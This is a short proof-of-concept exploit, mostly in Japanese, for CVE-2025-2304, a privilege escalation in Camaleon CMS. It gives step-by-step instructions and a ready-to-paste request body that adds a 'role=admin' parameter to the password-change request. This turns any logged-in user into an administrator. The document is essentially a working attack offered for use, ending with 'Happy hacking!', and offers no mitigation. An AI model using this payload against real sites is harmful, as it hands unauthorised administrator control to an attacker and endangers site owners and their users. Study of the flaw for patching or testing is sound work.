
CVE-2025-2304 POC - Camaleon CMS Privilege Escalation
CVE-2025-2304 POC - Camaleon CMS 権限昇格
このPOCは、Camaleon CMSの権限を管理者に昇格させるために使用されます。このエクスプロイトは、認証されたユーザーのパスワードリセット機能にロールを注入することで動作します。
まず、ユーザーアカウントにログインします。ログイン後、プロフィールページに移動し、「パスワード変更」をクリックします。Burp Suiteを使用してパスワード変更機能をキャプチャします。
以下の例を参考に、ペイロードを編集してロールを追加します。
_method=patch&authenticity_token=gHl57BgeyzdyiC3AzDPgwY2Wn82rjrWNXG_1cCnZbPgg4tkN8_u2nWtqBusMawZOrXpkh0hHXDYhpojYXvVTvQ&password%5Bpassword%5D=test1234&password%5Bpassword_confirmation%5D=test1234&password%5Brole%5D=admin
ペイロードに%5Brole%5D=adminを追加することで、管理者になることができます。
ページをリフレッシュすると、管理者になっているはずです。
ハッピーハッキング!